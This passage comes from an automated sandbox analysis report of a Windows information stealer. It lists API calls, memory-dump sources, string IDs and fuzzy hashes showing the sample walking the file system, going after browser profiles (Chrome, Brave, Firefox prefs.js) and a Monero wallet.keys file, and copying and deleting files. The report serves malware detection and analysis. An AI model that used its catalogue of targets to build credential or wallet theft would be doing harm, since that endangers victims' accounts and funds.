                  • lstrcat.KERNEL32(?,?), ref: 00FC3935
                  • StrCmpCA.SHLWAPI(?,00FD0F70), ref: 00FC3947
                  • StrCmpCA.SHLWAPI(?,00FD0F74), ref: 00FC395D
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00FC3C67
                  • FindClose.KERNEL32(000000FF), ref: 00FC3C7C
                  Strings
                   Memory Dump Source
                   • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true (associated dumps identical to the list above)
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                  • API String ID: 1125553467-2524465048
                  • Opcode ID: ba182901db47596e9b79da6e8ded2ee83e8ea1025b9762fcb7fbf4ceaf1666a8
                  • Instruction ID: c62026397b93f8216f1dd746fd78770f126d087a5ce45314ee59ba41ac5db0c8
                  • Opcode Fuzzy Hash: ba182901db47596e9b79da6e8ded2ee83e8ea1025b9762fcb7fbf4ceaf1666a8
                  • Instruction Fuzzy Hash: 36A17FB29002099BCB34DB64DD85FEE7379BF88300F04859CA51E97145EB79AB84DF62
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                  • FindFirstFileA.KERNEL32(00000000,?,00FD0B32,00FD0B2B,00000000,?,?,?,00FD13F4,00FD0B2A), ref: 00FBBEF5
                  • StrCmpCA.SHLWAPI(?,00FD13F8), ref: 00FBBF4D
                  • StrCmpCA.SHLWAPI(?,00FD13FC), ref: 00FBBF63
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00FBC7BF
                  • FindClose.KERNEL32(000000FF), ref: 00FBC7D1
                  Strings
                   Memory Dump Source
                   • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true (associated dumps identical to the list above)
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                  • API String ID: 3334442632-726946144
                  • Opcode ID: 7b39ac6b48869e953637f47cdd7562824a5b895ebce1593deb53070dc9e3c705
                  • Instruction ID: 888022208d8e9f505e44632e9c1d8908fba4658c84a20a0da29e4efb9578a1cf
                  • Opcode Fuzzy Hash: 7b39ac6b48869e953637f47cdd7562824a5b895ebce1593deb53070dc9e3c705
                  • Instruction Fuzzy Hash: 97423372910109ABCB14FB60DE57FEE7379AF84304F40456CB50A96181EF38AB49DBA2
                  APIs
                  • wsprintfA.USER32 ref: 00FC492C
                  • FindFirstFileA.KERNEL32(?,?), ref: 00FC4943
                  • StrCmpCA.SHLWAPI(?,00FD0FDC), ref: 00FC4971
                  • StrCmpCA.SHLWAPI(?,00FD0FE0), ref: 00FC4987
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00FC4B7D
                  • FindClose.KERNEL32(000000FF), ref: 00FC4B92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s$%s\%s$%s\*
                  • API String ID: 180737720-445461498
                  • Opcode ID: f30308f027a39617137692dff5ee270b890f600c17fcf94aa4306e2f7e3e8cfd
                  • Instruction ID: b256ce09fea5d03e95b49bf998b88d215fea6dcdc373a78405179b4abdd88d4c
                  • Opcode Fuzzy Hash: f30308f027a39617137692dff5ee270b890f600c17fcf94aa4306e2f7e3e8cfd
                  • Instruction Fuzzy Hash: EB6162B2900219ABCB34EBA0EC45FEA737CBF48701F04459CA51E92144EB75EB859FA1
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00FC4580
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC4587
                  • wsprintfA.USER32 ref: 00FC45A6
                  • FindFirstFileA.KERNEL32(?,?), ref: 00FC45BD
                  • StrCmpCA.SHLWAPI(?,00FD0FC4), ref: 00FC45EB
                  • StrCmpCA.SHLWAPI(?,00FD0FC8), ref: 00FC4601
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00FC468B
                  • FindClose.KERNEL32(000000FF), ref: 00FC46A0
                  • lstrcat.KERNEL32(?,00C8EA18), ref: 00FC46C5
                  • lstrcat.KERNEL32(?,00C8DBA0), ref: 00FC46D8
                  • lstrlen.KERNEL32(?), ref: 00FC46E5
                  • lstrlen.KERNEL32(?), ref: 00FC46F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                  • String ID: %s\%s$%s\*
                  • API String ID: 671575355-2848263008
                  • Opcode ID: 636eb5ecac864942893d45a8e4d246a0fba78e61008c2c3202153b78795fb265
                  • Instruction ID: 4ec28969c1416ef91c83388230d4b44ef6f5b1d6dd14ae7b5fb5e35340e45804
                  • Opcode Fuzzy Hash: 636eb5ecac864942893d45a8e4d246a0fba78e61008c2c3202153b78795fb265
                  • Instruction Fuzzy Hash: 675155719002189BC724EB70DD9AFE9737CAF58700F40459CB51E92144EB79AA859F91
                  APIs
                  • wsprintfA.USER32 ref: 00FC3EC3
                  • FindFirstFileA.KERNEL32(?,?), ref: 00FC3EDA
                  • StrCmpCA.SHLWAPI(?,00FD0FAC), ref: 00FC3F08
                  • StrCmpCA.SHLWAPI(?,00FD0FB0), ref: 00FC3F1E
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00FC406C
                  • FindClose.KERNEL32(000000FF), ref: 00FC4081
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s
                  • API String ID: 180737720-4073750446
                  • Opcode ID: 0bd13d4d57dfce75044853c128eee5379e8ea7ab957c78e8ff8eef99fe9bf381
                  • Instruction ID: e913659a028f83bc401e1e495bc58ed9fdb62bf2d618f445fbbb980fbc5c2686
                  • Opcode Fuzzy Hash: 0bd13d4d57dfce75044853c128eee5379e8ea7ab957c78e8ff8eef99fe9bf381
                  • Instruction Fuzzy Hash: FB5165B2900219ABCB24EBB0DD46FEA737CBF48700F44459CB25D92044DB79AB859F61
                  APIs
                  • wsprintfA.USER32 ref: 00FBED3E
                  • FindFirstFileA.KERNEL32(?,?), ref: 00FBED55
                  • StrCmpCA.SHLWAPI(?,00FD1538), ref: 00FBEDAB
                  • StrCmpCA.SHLWAPI(?,00FD153C), ref: 00FBEDC1
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00FBF2AE
                  • FindClose.KERNEL32(000000FF), ref: 00FBF2C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\*.*
                  • API String ID: 180737720-1013718255
                  • Opcode ID: c34352d4309462fda64fe1d2c582d264190d71829043d09ec0ae9ba8aee2cf0b
                  • Instruction ID: cbf3a044b7df04cac8de88851e8214f8e582ec873fa55d7201688fc508f6f69c
                  • Opcode Fuzzy Hash: c34352d4309462fda64fe1d2c582d264190d71829043d09ec0ae9ba8aee2cf0b
                  • Instruction Fuzzy Hash: F5E1BD7191111D9AEB68EB60DD53FEE7338AF54304F4041ADB50A62092EE387F8AEF51
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00FD15B8,00FD0D96), ref: 00FBF71E
                  • StrCmpCA.SHLWAPI(?,00FD15BC), ref: 00FBF76F
                  • StrCmpCA.SHLWAPI(?,00FD15C0), ref: 00FBF785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00FBFAB1
                  • FindClose.KERNEL32(000000FF), ref: 00FBFAC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: prefs.js
                  • API String ID: 3334442632-3783873740
                  • Opcode ID: d222fa31615b2030bd86b649eee27197ab6b64461dddc63c816d649bf79b9b60
                  • Instruction ID: 3a9b12e7b7eb656574292ae50e9d79854e53069b81640732f7f908dac419dfb8
                  • Opcode Fuzzy Hash: d222fa31615b2030bd86b649eee27197ab6b64461dddc63c816d649bf79b9b60
                  • Instruction Fuzzy Hash: 5DB143719001099BDB28EF60DD97FED7379AF54304F4085ADA40A97181EF38AB49EF92
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00FD510C,?,?,?,00FD51B4,?,?,00000000,?,00000000), ref: 00FB1923
                  • StrCmpCA.SHLWAPI(?,00FD525C), ref: 00FB1973
                  • StrCmpCA.SHLWAPI(?,00FD5304), ref: 00FB1989
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FB1D40
                  • DeleteFileA.KERNEL32(00000000), ref: 00FB1DCA
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00FB1E20
                  • FindClose.KERNEL32(000000FF), ref: 00FB1E32
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 1415058207-1173974218
                  • Opcode ID: 1d388caaa9d0122fbd1d792587cd91265602980f4e53a031e98d81568b92e244
                  • Instruction ID: 838dbe4bf447caf1fb40172993dc19fa380b1cc96e80c5b1ee7f78dc0b74034d
                  • Opcode Fuzzy Hash: 1d388caaa9d0122fbd1d792587cd91265602980f4e53a031e98d81568b92e244
                  • Instruction Fuzzy Hash: E912C97191011D9BDB29EB60DD97FEE7378AF54304F4041ADA10A620D1EE387B89EF92
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00FD0C2E), ref: 00FBDE5E
                  • StrCmpCA.SHLWAPI(?,00FD14C8), ref: 00FBDEAE
                  • StrCmpCA.SHLWAPI(?,00FD14CC), ref: 00FBDEC4
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00FBE3E0
                  • FindClose.KERNEL32(000000FF), ref: 00FBE3F2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                  • String ID: \*.*
                  • API String ID: 2325840235-1173974218
                  • Opcode ID: 0718964c79f684fc0e41165f400d671ef5ee3902245c85df4b29f122702cffaa
                  • Instruction ID: a6a1d176a5b40724f01dea5b268f4a55d41ebc5e449bc8af8a7cd7f5e90c22c9
                  • Opcode Fuzzy Hash: 0718964c79f684fc0e41165f400d671ef5ee3902245c85df4b29f122702cffaa
                  • Instruction Fuzzy Hash: 47F17B7181411D9BDB29EB60DD96FEE7338AF14304F40419EA41A62091EE387F8ADE52
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00FD14B0,00FD0C2A), ref: 00FBDAEB
                  • StrCmpCA.SHLWAPI(?,00FD14B4), ref: 00FBDB33
                  • StrCmpCA.SHLWAPI(?,00FD14B8), ref: 00FBDB49
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00FBDDCC
                  • FindClose.KERNEL32(000000FF), ref: 00FBDDDE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: d185a6a3605c785c718d3dbf2c0eb0d4a02fea9a85d7109c384bdf09fde5b6f5
                  • Instruction ID: 781241dea92b82b6a6f0ef1d4f8178c7771ebbae33a5db5e012e729e6c950df2
                  • Opcode Fuzzy Hash: d185a6a3605c785c718d3dbf2c0eb0d4a02fea9a85d7109c384bdf09fde5b6f5
                  • Instruction Fuzzy Hash: 6F9133729001099BCB14FB70ED57EED737DAF84304F40866CB81A96185FE38AB599F92
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                  • GetKeyboardLayoutList.USER32(00000000,00000000,00FD05AF), ref: 00FC7BE1
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00FC7BF9
                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00FC7C0D
                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00FC7C62
                  • LocalFree.KERNEL32(00000000), ref: 00FC7D22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                  • String ID: /
                  • API String ID: 3090951853-4001269591
                  • Opcode ID: 9e244e51b4f222332789c97875b9d8c26c2016ab79872bb70a1de21956ad4784
                  • Instruction ID: 260bee2255410e70c51aa9a7413246aa9d396ff66130991b575cf0e990f59ab0
                  • Opcode Fuzzy Hash: 9e244e51b4f222332789c97875b9d8c26c2016ab79872bb70a1de21956ad4784
                  • Instruction Fuzzy Hash: 4741287194021DABCB24EB94DD9AFEEB374FF44704F204199E40A62280DB786E85DFA1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: !5y$"JoR$&&7>$@Tm$fp?$w_~$|%/I
                  • API String ID: 0-4263199632
                  • Opcode ID: c34427f028f08696c64a6c8d0ae6391fb2a3d4cef0b2ab099168b0b7667a2888
                  • Instruction ID: 05cdf1741658230db11c268d4e323a446f86ba9024dedca74cf95d266f51c15c
                  • Opcode Fuzzy Hash: c34427f028f08696c64a6c8d0ae6391fb2a3d4cef0b2ab099168b0b7667a2888
                  • Instruction Fuzzy Hash: 85B203F360C204AFE3086E2DEC8567AFBE9EF94720F16492DE6C5C3744EA3558418B56
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00FD0D73), ref: 00FBE4A2
                  • StrCmpCA.SHLWAPI(?,00FD14F8), ref: 00FBE4F2
                  • StrCmpCA.SHLWAPI(?,00FD14FC), ref: 00FBE508
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00FBEBDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 433455689-1173974218
                  • Opcode ID: a51d0747d230651e89888983a3afca229691636028b58f4fa7167105c69008ac
                  • Instruction ID: 96b60b4fbba8590df5cec64286f08ba594b34628a92ccd20b1e02c87bbb87fea
                  • Opcode Fuzzy Hash: a51d0747d230651e89888983a3afca229691636028b58f4fa7167105c69008ac
                  • Instruction Fuzzy Hash: 3412197191011D9BDB28FB60DE97FED7339AF54304F4041ADA50A921C1EE386F49EBA2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: l\O$$`$%Yy$e!]$g; $pj+
                  • API String ID: 0-3638067969
                  • Opcode ID: 4a9c8023efe509bf0edd2522acb12609e9e55d57847a0fb0056202237163bb57
                  • Instruction ID: 4a7eb45e03ae3881b081c057f26f88160c82d52ae76025c1ede92af87ecc2c4d
                  • Opcode Fuzzy Hash: 4a9c8023efe509bf0edd2522acb12609e9e55d57847a0fb0056202237163bb57
                  • Instruction Fuzzy Hash: 80B208F360C2109FE7046E2DEC8567ABBE9EF94720F1A463DE6C4C3744EA3598058697
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 7T]/$F'}$V&~$brqO$.O]$3Y@
                  • API String ID: 0-3354459736
                  • Opcode ID: a9a35a483cab9ff0dd60d75598899ae2f88e83cd5c3890575ccbc29cd324a0eb
                  • Instruction ID: 539b90552102a31874366a8172bb0aa7ffac5b7bdc5a39a3e2459d0c0b9abc84
                  • Opcode Fuzzy Hash: a9a35a483cab9ff0dd60d75598899ae2f88e83cd5c3890575ccbc29cd324a0eb
                  • Instruction Fuzzy Hash: F5B2F6F360C200AFE3086F29EC8567ABBE9EF94720F16493DEAC587744E63558018797
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
